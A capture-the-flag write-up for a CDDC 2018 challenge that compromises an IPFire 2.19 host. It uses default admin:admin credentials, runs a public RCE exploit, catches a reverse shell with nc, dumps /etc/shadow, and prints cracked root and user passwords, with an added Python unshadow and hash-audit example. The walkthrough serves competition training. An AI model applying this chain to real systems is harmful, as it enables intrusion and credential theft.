CDDC 2018: He Should Be Able To Inteprete the Entire Imperial Network

Category: Kamikaze
Points: 77
Description:

  1. Exploit the target 10.50.0.199 and extract the password hash for the user id ending with 'ard' from a file inside the /etc/ folder.
  2. Submit the hashed password extracted from step 1 into response field below.
  3. Submit the Kamikaze Challenge by clicking on the Submit button.

Write-Up

So, starting off, we nmap the target,

$ nmap 10.50.0.199 -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-01 16:26 +08
Nmap scan report for 10.50.0.199
Host is up (0.014s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2 (protocol 2.0)
444/tcp open  ssl/http Apache httpd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.74 seconds

Oh look, port 444. It also happens to be SSL-secured, so let's try and browse the URL to see what we find.

[Screenshot: the web interface on port 444 prompting for a username and password]

Oh, it's asking for a username and password! Let's try and see if we can try the good ol' admin:admin.

[Screenshot: logged in with admin:admin, showing the IPFire 2.19 interface]

That's just not secure! So what do we have? Well, we have IPFire 2.19. A little Googling and we find a remote code execution exploit for it!

root@ctf:~# python 42149.py 
/usr/local/lib/python2.7/dist-packages/urllib3/connectionpool.py:858: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
  InsecureRequestWarning)
[+] IPFire Installation is Vulnerable [+]
[+] Sending Malicious Payload [+]
/usr/local/lib/python2.7/dist-packages/urllib3/connectionpool.py:858: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
  InsecureRequestWarning)

On our listening machine, we get a shell.

$ nc -nvlp 31337
listening on [any] 31337 ...
connect to [192.168.254.1] from (UNKNOWN) [35.198.199.50] 45684
bash: cannot set terminal process group (2200): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.3$ ls
aliases.cgi
atm-status.cgi
backup.cgi
bluetooth.cgi
cachemgr.cgi
chpasswd.cgi
connections.cgi
connscheduler.cgi
country.cgi
credits.cgi
ddns.cgi
dhcp.cgi
dns.cgi
dnsforward.cgi
entropy.cgi
extrahd.cgi
fireinfo.cgi
firewall.cgi
fwhosts.cgi
geoip-block.cgi
gpl.cgi
gui.cgi
hardwaregraphs.cgi
hosts.cgi
ids.cgi
index.cgi
ipinfo.cgi
iptables.cgi
logs.cgi
mac.cgi
mail.cgi
mdstat.cgi
media.cgi
memory.cgi
modem-status.cgi
modem.cgi
netexternal.cgi
netinternal.cgi
netother.cgi
netovpnrw.cgi
netovpnsrv.cgi
optionsfw.cgi
ovpnmain.cgi
p2p-block.cgi
pakfire.cgi
pppsetup.cgi
proxy.cgi
qos.cgi
remote.cgi
routing.cgi
services.cgi
shutdown.cgi
speed.cgi
system.cgi
time.cgi
traffic.cgi
updatexlrator.cgi
urlfilter.cgi
vpnmain.cgi
wakeonlan.cgi
webaccess.cgi
wireless.cgi
wirelessclient.cgi
wlanap.cgi

Now, the challenge asks for the hashed password of the user whose name ends with 'ard'. Let's check /etc/shadow.

$ cat shadow
cat shadow
root:$1$kzT0KHxS$bf.vpPDCkMnl22Itm7ScB0:17570:0:99999:7:::
bin:x:16892:0:99999:7:::
daemon:x:16892:0:99999:7:::
mail:x:16892:0:99999:7:::
squid:x:16892:0:99999:7:::
ntp:x:16892:0:99999:7:::
mysql:x:16892:0:99999:7:::
ftp:x:16892:0:99999:7:::
vsftpd:x:16892:0:99999:7:::
rsyncd:x:16892:0:99999:7:::
stunnel:x:16892:0:99999:7:::
sshd:x:16892:0:99999:7:::
nobody:x:16892:0:99999:7:::
postfix:x:16892:0:99999:7:::
snort:x:16892:0:99999:7:::
logwatch:x:16892:0:99999:7:::
dnsmasq:x:16892:0:99999:7:::
cron:x:16892:0:99999:7:::
clamav:x:16892:0:99999:7:::
amavis:x:16892:0:99999:7:::
cyrus:x:16892:0:99999:7:::
filter:x:16892:0:99999:7:::
mldonkey:x:16892:0:99999:7:::
asterisk:x:16892:0:99999:7:::
samba:x:16892:0:99999:7:::
moveforward:$1$mnY/79Iy$D.uBUj//vcrQemD8ZNmSg.:17665:0:99999:7:::

What is this? /etc/shadow readable by a normal user? Now we have two hashes! Running them through unshadow (together with /etc/passwd) and filtering out the accounts with no real hash, we have two usable hashes to crack.

root:$1$kzT0KHxS$bf.vpPDCkMnl22Itm7ScB0:0:0:root:/root:/bin/bash
moveforward:$1$mnY/79Iy$D.uBUj//vcrQemD8ZNmSg.:1001:100::/home/moveforward:/bin/bash
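The unshadow step above is just a join of /etc/passwd and /etc/shadow on the username; the following is an added example (not code from the write-up or from John the Ripper) that performs that join, drops locked or passwordless accounts, names the crypt(3) scheme from the hash prefix so a defender can spot weak md5crypt ($1$) hashes like the two here, and picks out the user by name suffix. The shadow lines are the ones from the dump above; the /etc/passwd lines are constructed to match the unshadow output.

```python
"""Added example: unshadow-style join plus a quick audit of the hash fields."""

# Constructed /etc/passwd lines consistent with the write-up's unshadow output.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
moveforward:x:1001:100::/home/moveforward:/bin/bash
"""

# /etc/shadow lines taken from the dump in the write-up (bin kept as a locked example).
SHADOW_SAMPLE = """\
root:$1$kzT0KHxS$bf.vpPDCkMnl22Itm7ScB0:17570:0:99999:7:::
bin:x:16892:0:99999:7:::
moveforward:$1$mnY/79Iy$D.uBUj//vcrQemD8ZNmSg.:17665:0:99999:7:::
"""

# crypt(3) prefixes and the algorithm each denotes; $1$ is the weak, fast md5crypt.
CRYPT_SCHEMES = {"$1$": "md5crypt", "$5$": "sha256crypt",
                 "$6$": "sha512crypt", "$y$": "yescrypt"}


def parse_shadow(text):
    """Return {user: hash_field} for every well-formed shadow line."""
    hashes = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0]:
            hashes[fields[0]] = fields[1]
    return hashes


def unshadow(passwd_text, shadow_text):
    """Replace the 'x' in each passwd line with the matching shadow hash."""
    hashes = parse_shadow(shadow_text)
    merged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue  # not a valid 7-field passwd entry
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def crackable_accounts(passwd_text, shadow_text):
    """Keep only entries that carry a real hash; tag each with its scheme."""
    result = []
    for line in unshadow(passwd_text, shadow_text):
        user, hash_field = line.split(":")[:2]
        if hash_field in ("x", "") or hash_field[0] in "!*":
            continue  # locked account or no password set
        scheme = next((name for prefix, name in CRYPT_SCHEMES.items()
                       if hash_field.startswith(prefix)), "unknown")
        result.append((user, hash_field, scheme))
    return result


def users_with_suffix(shadow_text, suffix):
    """Usernames in the shadow file ending with the given suffix."""
    return [user for user in parse_shadow(shadow_text) if user.endswith(suffix)]
```

On a real system the same audit over /etc/shadow tells you which accounts still use md5crypt and should be re-hashed with sha512crypt or yescrypt.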

Cracking them, we get the following:

root:spiderman
moveforward:moveforward

As the challenge is asking for the password hash of the user whose name ends with 'ard', that is moveforward, and we can just submit its hash as the flag.

Therefore, the flag is $1$mnY/79Iy$D.uBUj//vcrQemD8ZNmSg. (the hash itself ends in a dot).
